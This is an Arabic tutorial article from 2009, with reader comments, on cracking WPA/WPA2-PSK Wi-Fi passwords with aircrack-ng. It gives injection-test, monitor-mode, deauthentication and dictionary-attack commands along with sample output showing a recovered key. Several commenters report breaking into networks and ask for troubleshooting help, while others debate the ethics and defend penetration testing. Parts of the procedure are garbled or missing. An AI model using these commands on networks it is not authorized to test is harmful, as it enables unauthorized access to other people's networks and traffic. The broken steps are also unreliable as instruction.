| كسر تشفير شبكة الوايرلس WPA/WPA2 - PSK |
| الكاتب JoNa |
| الأربعاء, 10 يونيو 2009 19:53 |
|
شرح كيفية فك تشفير شبكات الوايرلس التي تستخدم تشفير WPA/WPA2-PSK عن طريق عمل هجوم Brute force لاستخراج مفتاح الشبكة باسخدام مجموعة Aricrack-ng. معلومات يجب أن تعرفها:
سأستخدم نظام لينوكس وحزمة Aircrack-ng. وأنبه ﻷن المقال للاغراض العلمية فقط.
قبل البدء بعملية الكسر - BEFORE THE CRACKING:يجب ان يكون كرت الوايرلس الذي تستخدمه يدعم الحقن او الـ injection ولمعرفة ذلك استخدم الامر التالي : aireplay-ng -9 -e JONA -a 00:de:af:da:c7:00 wlan09- تعني اختبار الحقن. 11:01:06 Injection is working! 11:01:07 Found 1 APs 11:01:07 Trying directed probe requests... 11:01:07 00:14:6C:7E:40:80 - channel: 9 - 'JONA' 11:01:07 Ping (min/avg/max): 2.763ms/4.190ms/8.159ms 11:01:07 30/30: 100% وأهم سطرين هما الثالث والاخير وهنا القيمة في السطر الاخير هي %100 وهذا يعني ان بامكاننا عمل injection للشبكة. يجب ان تكون قريب كفاية من الشبكة المستهدفة لكي تستطيع ارسال الباكيت لها وتذكر ان اشارة الاكسس بوينت اقوى من اشارة كرت الوايرلس لديك وهذا يعني انك اذا كنت تستطيع استقبال الباكيت من الاكسس بوينت فذلك لا يعني انك تستطيع ارسال الباكيت.
الخطوات التي سنقوم بتنفيذها - CRACKING STEPS:
عملية كسر تشفير شبكة الوايرلس - CRACKING:نبدأ العملية بوضع كرت الوايرلس بالوضع monitor بتنفيذ الأمر التالي: airmon-ng start wlan0 9wlan0: كرت الوايرلس c- القناة التي تستخدمها الاكسس بوينت. 0- تعني deauthentication 1 هي عدد الـ deauthentication التي سيتم ارسالها نفذ الأمر لكسر تشفير الملف واستخراج مفتاح الشبكة: aircrack-ng -w password.lst -b 00:de:af:da:c7:00 psk*.cap-w ملف المفاتيح الذي سيتم اختبارها والناتج سيكون كالاتي: Aircrack-ng 0.8 [00:00:00] 2 keys tested (37.20 k/s)KEY FOUND! [ 123456 ] Master Key : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98 CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40 FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E 2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71 EAPOL HMAC : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB واخيرا فان فك تشفير بروتوكول WPA-PSK مستحيل اذا كان المفتاح يتكون من اكثر من 20 خانة.
إضافة إلى المفضلة
مشاركة
إرسال إلى صديق
المشاهدات: 34830 التعليقات (40)
  أرسلت بواسطة: dGeeky في June 11, 2009
عمل key بكلمات يصعب كسرها
كما يلاحظ KEY= 123456 وهدا متوفر في الwordlist لدا تم كسره بسرعة العملية تعتمد على قوة الkey
 أرسلت بواسطة: Own3r في June 11, 2009
سلمة يداك JoNa
على الشرح جاري التجربة ولي رجعه في حال الاستفسار تقبل تحياتي
 أرسلت بواسطة: عبدالمهيمن في June 11, 2009
موضوع جميل ومفصّل, شكرا JoNa على الموضوع وأهلا بك في iSecur1ty :)
بالنسبة لمفتاح شبكات الوايرلس قليلون جدا من يستخدم مفتاح معقّد يحتوي على أحرف, أرقام ورموز فالأغلبية يكتفي بالأرقام فقط لتسهيل حفظ المفتاح و في أحسن الأحوال يكون المفتاح عبارة عن أحرف صغيرة وأرقام وهذا طبعا يخفض عدد الاحتمالات بدرجة كبيرة.
 أرسلت بواسطة: ابوعبدالله في June 11, 2009
السلام عليكم
بدأ الموقع يتحول لتعليم التهكير بأسم الاغراض العلمية فقط!!! بكره نشوف تعليم استخدام الشلات phpshell وكيفية اختراق المنتديات(طبعا راح نقول اخترقوا مواقع اليهود وايضا التعليم لاغراض علميه فقط) وكم يوم ويتم شرح كيفية اختراق الاجهزة الشخصية وكيفية سرقة بيانات وصور الضحيه وايضا السبب لأغراض علمية فقط ياأخي صاحب الموقع أتق الله فيما تفعل وتقول وتنشر في موقعك باسم الاغراض العلميه فقط مافيه واحد اصلا يدخل ويتعلم الا يروح ويستعمل اللى فهمه منك فى ضرر المسلمين صدقني مافيه احد يبحث عن الاغراض العلميه على قولتك وكثير من الناس لما يعرف حاجه تضر المسلمين فى مواقعهم على طول راح يطبق عليهم فياليت ماتساعدهم بنشرك للمعلومات المضره للناس اتمني تتقبل نقدي بصدر رحب والسلام عليكم ورحمة الله وبركاته
 أرسلت بواسطة: JoNa في June 11, 2009
الصادق :- ضع كلمة مرور تتكون من ارقام وحروف واحد الرموز الخاصة على الاقل
مثل 12345AbCdE? وحاول ان تستخدم الاحرف الكبيرة والصغيرة معا لان كلمة المرور حساسة لحالة الاحرف . azzdine :- كما قلت فالعملية تعتمد على قوة المفتاح ولكن البعض يريد مفتاحا يسهل تذكره وهذه هي المشكلة . Own3r :- بانتظار استفساراتك . عبدالمهيمن :- كما قلت قالكل يريد مفتاحا يسهل تذكره . والكثيرين يضعون رقم هاتفهم كمفتاح للشبكة . وشكرا على التنسيق الجميل للموضوع .
أرسلت بواسطة: عبدالمهيمن في June 11, 2009
وعليكم السلام أخي.. في البداية دعني أوضح لك أمر مهم جداً.
الاختراق علم موجود شئت ذلك أم أبيت وأصلا بدونه لا يوجد معنى للحماية وكن متأكد أن لا أنت ولا أنا نستطيع اخفاؤه! هل تعتقد أن الحل الصحيح للحماية هو ابقاء جميع المعلومات وطرق الاختراق مكتومة؟! أم ننشر الاثنين ليعرف مدير الشبكة كيف يتم الاختراق ويتمكن من حماية شبكته؟ الموقع يركز على مفهوم اختبار الاختراق Penetration Testing أنصحك أن تقرأ عنه لتعرف لماذا نقوم نحن بنشر هذه المعلومات وتذكر أن كل شيء بالحياة سلاح ذو حدين وبدورنا علينا أن نعرف كيفية استخدامه والتعامل معه واستغلاله في الأمور الجيدة. دمت بود...
أرسلت بواسطة: JoNa في June 11, 2009
صحيح انني ذكرت كيفية فك تشفير الشبكات ولكنني ايضا ذكرت كيف تحمي شبكتك .
اما بالنسبة لهذا الموقع فهو من المواقع القليلة التي تهتم بالحماية والاختراق (معا) ...
 أرسلت بواسطة: Napst3r في June 12, 2009
موضوع منتشر بكثرة وقديم نوعا ما,,لكن اعجبتني طريقتك في شرحه..
مجهود تشكر عليه.. وبالتوفيق لكم في الموقع هذا.. سلملم
 أرسلت بواسطة: Mr.ShArK في June 22, 2009
شرح رائع جدا ،،
موجد عندي تقريب شرح قريب منه لكن بالفديو بنزله قريبا ،،
 أرسلت بواسطة: 'D2J/J في June 23, 2009
السلام عليكم
الحمدلله انا نجحت في فك تشفير WEP ولكن تواجهني صعوبه في WPA2 الرجوا المساعدة انا وصلت الى الخطوة aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 wlan0 الرجو التوضيح واذا كان بالصور كان افضل وشكراااااااااااا
 أرسلت بواسطة: استفسار في June 28, 2009
عزيزي عند تطبيق الامر
aireplay-ng -9 -e JONA -a 00:de:af:da:c7:00 wlan0 جاني ioctl(SIOCSIWMODE) failed: Device or resource busy ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211, ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead. Make sure RFMON is enabled: run 'airmon-ng start wlan0 ' Sysfs injection support was not found either. اش تعني ؟؟
 أرسلت بواسطة: ابو ساهر في July 01, 2009
يوجد عندي الباك تراك 3 نفس الخطوات التي ذكرتها تمشي في الباك تراك لكن أمر استخراج المفتاح في الباك تراك 3 يختلف عن خطوتك هنا الاخيره وقد جربته مانفع امرك في الاستخراج ( المفتاح ) واريد اعرف ماهو الامر في الخطوه الاخيره في الباك تراك 3 لكي استخرج المفتاح فقط (نفذ الأمر لكسر تشفير الملف واستخراج مفتاح الشبكة:) ممكن تكتبه لي ياغالي بجربه ( الامر الاخير فقط )على شبكتي وأشوف هل يكسره ام لا ؟؟ ويعطيك العافيه .
أرسلت بواسطة: عابر سبيل في July 06, 2009
السلام عليكم
شرح اكثر من رائع بس عندي مشكلة في بداية الموضوع اذا شبكتي ما تدعم injection كيف استطيع جعلها تدعم الـ injection او الحقن
 أرسلت بواسطة: ديوان في July 08, 2009
يا ليت توضح هل الشرح ينفع مع نظام ويندوز؟
 أرسلت بواسطة: Hamed في July 10, 2009
مشكووووووووووور على الشرح
فقط تسجيل حظور خخخخخخ الحمد لله قد اخترقت شبكه من قبل و فاهم كل شي و انا اعتبر فك wpa2 كأنه burte force رغم الي قد فكيت wep و الحمد لله تحيآأتي
 أرسلت بواسطة: osama في July 15, 2009
بسم الله الرحمن الرحيم
اولا اشكرك على الشرح الوافى والشرح المذهل وسعة صدرك لكن انا ليا تعليق اللينكس صعب جدا فى التعامل المشكله عندى فى تعريف الكارت بالباتش بتاع aircrack انا لم استطيع حتى الان الوصول لهذه النقطه وسالت مهندسين كمبيوتر لكن للاسف مفيش حد فيهم فاهم حاجه فى اللينكس ده نوع الكارت بتاعى linksys wusb600n وهو من الكروت المدعومه والباتش معايا وعندى النسخه من backtrack3
 أرسلت بواسطة: ماجد في July 19, 2009
الحمد الله كل الطرق جربتها ونجحت لكن نسبة نجاح فك تشفير WPA تعتمد على قوة ملف Password.lst كلما كان حجمه كبير كانت نسبة النجاح أكبر
ولهذا أكبر حجم وصلت له حتى الان في الملف هو 25 كيلو بايت هل هناك أحجام أكبر ؟؟ ومن لديه الملف أتمنى أن يزودنا به
 أرسلت بواسطة: حميد العنزي في August 08, 2009
السلام عليكم اذا سمحتوا الى الان ما عرفت فك WPA , عندي كرت الوايرلس الفاااا
ونظام التشغيل اكسبي فا كيف اكسر تشفير WPA ؟؟؟؟؟؟
 أرسلت بواسطة: Hussain في August 23, 2009
اخوي ايش كروت الوايرلس الي تدعم استخدام مجموعة aircrack ؟
 أرسلت بواسطة: al pacino في September 08, 2009
اخ ماجد بالنسبة للباسورد ليست يمكن تحميل واحدة تضم مليون كلمة (وزنها 32 جيقا تقريبا) من موقع aircrack-ng ولكن تبقى فرصة نجاح العملية ضئيلة
 أرسلت بواسطة: DRISS Amine في October 26, 2009
لدي كارت من نوع Intel(R) WiFi Link 5100 AGN
هل يدعم Injection لأني جربت الشرح مرات عديدة و لم ينجح معي
 أرسلت بواسطة: sony في November 21, 2009
عزيزي كاتب الموضوع احب ان اشكرك على موضوعك جدا مفيد
وطريقه أطرح أكثر من رائعه لكن لدي استفسار بسيط وهو انك لم تذكر كيف استطيع ان احصل على عنوان الكلاينت الفيزيائي في هذا الأمر aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 wlan0 يعني من وين اجيب العنوان هذا 00:0F:B5:FD:FB:C2 شكرا
أرسلت بواسطة: sony في November 22, 2009
عرفت أجابة السؤال الي فوق
لكن السؤال هو ملف الباسورد لست هل هو من الاساس موجود اوا انا ضيفه او كيف علما اني استخدم باك تراك 4 شكرا
 أرسلت بواسطة: abuibrahim في November 22, 2009
اخي JoNa اشكرك على جهدك وشرحك الرائع ..
ذكرت اخي انه لا يمكن فك تشفير الـ WAP اذا كانت الباس وورد اكثر من 20 خانة ! حسب التجربة يمكن فك التشفير بشرط وجود نفس الباس وورد في الباس وورد لست حتى لو كانت اكثر من 20 حرف . شكرا لك اخي مرة اخرى . ابو ابراهيم
 أرسلت بواسطة: Mohammad Irshaid في November 29, 2009
تسلم يداك اخي , بس لو نعرف اذا في امكانية اختراق هاد التشفير عن طريق الوندوز
 أرسلت بواسطة: Knight في November 30, 2009
السلام عليكم
شرح رائع jona بخصوص الاختراق والحماية مدير النظام الصحيح القادر على حماية نظامة وشبكتها لابد من علمه بامور الهاكر دليل على ذالك شهادة الهاكر الاخلاقى فى الاساس هو يتدرب على امور الاختراق المختلفة والحماية ومنها بكدا يصبح هاكر ولاكن اخلاقى قدر على صد الهاكر وحماية الانظمة شكراا ليك جدااا وربنا يقويكم على اعطاء المزيد
أرسلت بواسطة: Knight في November 30, 2009
هناك سؤل بسيط اتمنى الاجابة عليه
هل استطيع تنفذ الشرح السابق من خلال اكسس بوينت ام لابد من وجود كارت ويرلس ؟؟؟
 أرسلت بواسطة: mostafa saieed في December 11, 2009
السلام عليكم
أناطالب فى كلية الهندسة مشروع تخرجى شغال فيه حاليا وهو فى الاتى : wireless network security audit using GPU programming الجزء المتعلق بالبرمجة على الجى بى يو بلغة الكودا والمالتى ثريدنج شغال فيه كويس لكن أنا ماليش خبرة فى مجال الحماية أو الهاكينج أو فك الشفرة أنا درست نظم التشفير الكلاسيكية مثل DES ,AES بدون إطالة , أنا عايز أعرف ابتدى منين .. عايز أتعلم الألجوريزمات ..وأعرف برامج الهاكرز وازاى أشغلها وأتابع ايه بالظبط على الموقع شكرا مقدما واسف على الإطالة
 أرسلت بواسطة: Alaa في December 14, 2009
تسلم أخي على الشرح .. لكن سؤال . انا كرت الوايرلس عندي لا يدعم الحقن .. وأريد شراء كرت جديد .. نصحوني بكرت usb dlink ,, قالولي أفضل . وأنا كنت خائف ما يدعم الحقن .. أرجو توضيع على الكروت اللي تدعم الحقن .. وإعطاء نصيحة حول شراء الكرت
 أرسلت بواسطة: صالح في March 06, 2010
جزاك الله اخي على هذا الشرح ولاكن مشكلتي تكمن في السطر الاخير
aircrack-ng -w password.lst -b 00:de:af:da:c7:00 psk*.cap 1- ملف password.lst هل هو موجد مع aircrack-ng ام يحتاج الى تنصيب وإذا كان يحتاج الى تنصيب فكيف يمكنني فعل ذلك 2- b 00:de:af:da:c7:00- هل هو رقم الماك ادرس لكرت الوايرليس لجهازي ام مازا 3- psk*.cap هي اسم المف الذي قمنا بأنشائه في البداية سوألي حول الملف لمذا نضع علامة النجمة رغم ان الملف لدي هو psk.cap ملاحة عند تنفيذي للسطر ظهر لي الخطاء التالي fopen(dictionary) failed: No such file or directory fopen(dictionary) failed: No such file or directory Opening psk-01.cap No matching network found - check your bssid. Quitting aircrack-ng...
أرسلت بواسطة: صالح في March 06, 2010
اسف نسيت ان اقول ان التي لدي هي باك تراك 4 فاينل رليس
أرسلت بواسطة: هكر كيجي ون في March 08, 2010
الحمد لله تم حل المشكلة بالحصول على password list
 أرسلت بواسطة: ras517 في March 15, 2010
لكن لم اشاهد صاحب الموضوع يتابع موضوعه في الرد على الاستفسارت بعد التطبيق
أضف تعليق
يجب عليك الاشتراك بالموقع لتتمكن من كتابة التعليقات, الاشتراك مجاني ويستغرق بضع ثوان فقط!
اذا كنت مشترك مسبقا في الموقع فضلاً قم بتسجيل الدخول. |
